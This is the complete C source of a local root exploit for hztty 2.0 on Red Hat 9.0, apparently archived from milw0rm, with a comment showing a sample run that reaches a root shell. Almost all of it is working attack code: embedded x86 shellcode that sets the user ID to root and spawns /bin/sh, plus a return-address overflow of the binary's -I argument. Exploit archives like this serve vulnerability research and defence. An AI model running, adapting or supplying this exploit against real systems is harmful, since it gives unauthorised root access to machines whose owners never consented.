hztty 2.0 (RedHat 9.0) - Local Privilege Escalation

/*  0x333hztty => hztty 2.0 local root exploit
 *
 *
 *	more info : Debian Security Advisory DSA 385-1
 *
 *	*note* I adjusted some part of hztty's code since
 *	there were some errors. hope this will not influence
 *	exploitation :> tested against Red Hat 9.0 :
 *
 * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k
 * [c0wboy@0x333 c0wboy]$ ./k
 *
 *  ---  local root exploit for hztty 2.0  ---
 *  ---  coded by c0wboy ~ 0x33  ---
 * 
 * sh-2.05b# [./hztty started]  [using /dev/ttyp6]
 * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)
 * sh-2.05b#
 *
 *  coded by c0wboy 
 *
 *  (c) 0x333 Outsiders Security Labs
 *
 */

#include <stdio.h>
#include <unistd.h>

#define BIN    "./hztty"
#define SIZE   272


unsigned char shellcode[] =
	"\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb\x89\xd8"
	"\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68"
	"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
	"\xd2\xb0\x0b\xcd\x80" ;

int main()
{
	int i;
	char out[SIZE];
	char *own[] = { shellcode, 0x0 };

	int *hztty = (int *)(out);
	int ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);

	for (i=0 ; i<SIZE-1 ; i+=4)
		*hztty++ = ret;

	hztty = 0x0;

	fprintf (stdout, "\n ---  local root exploit for hztty 2.0  ---\n");
	fprintf (stdout, " ---  coded by c0wboy ~ www.0x333.org   ---\n\n");

	execle (BIN, BIN, "-I", out, 0x0, own, 0x0);
}


// milw0rm.com [2003-09-21]